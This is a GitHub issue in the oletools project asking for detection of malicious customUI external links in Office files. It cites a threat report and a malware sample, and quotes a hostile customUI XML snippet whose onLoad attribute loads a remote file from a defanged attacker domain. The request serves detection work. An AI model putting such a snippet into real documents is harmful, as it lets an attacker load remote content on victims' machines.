oletools icon indicating copy to clipboard operation
oletools copied to clipboard

oleobj: add detection for customUI external links

Open decalage2 opened this issue 2 years ago • 1 comments

See this article: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html Sample: https://bazaar.abuse.ch/sample/f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4/

Example:

<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>
  • also update oleid to report it.

decalage2 avatar Jan 27 '22 20:01 decalage2

If this sample is publicly available, could we add it to our unit test samples and check that the customUI-threat is also detected in the future?

christian-intra2net avatar Feb 16 '22 10:02 christian-intra2net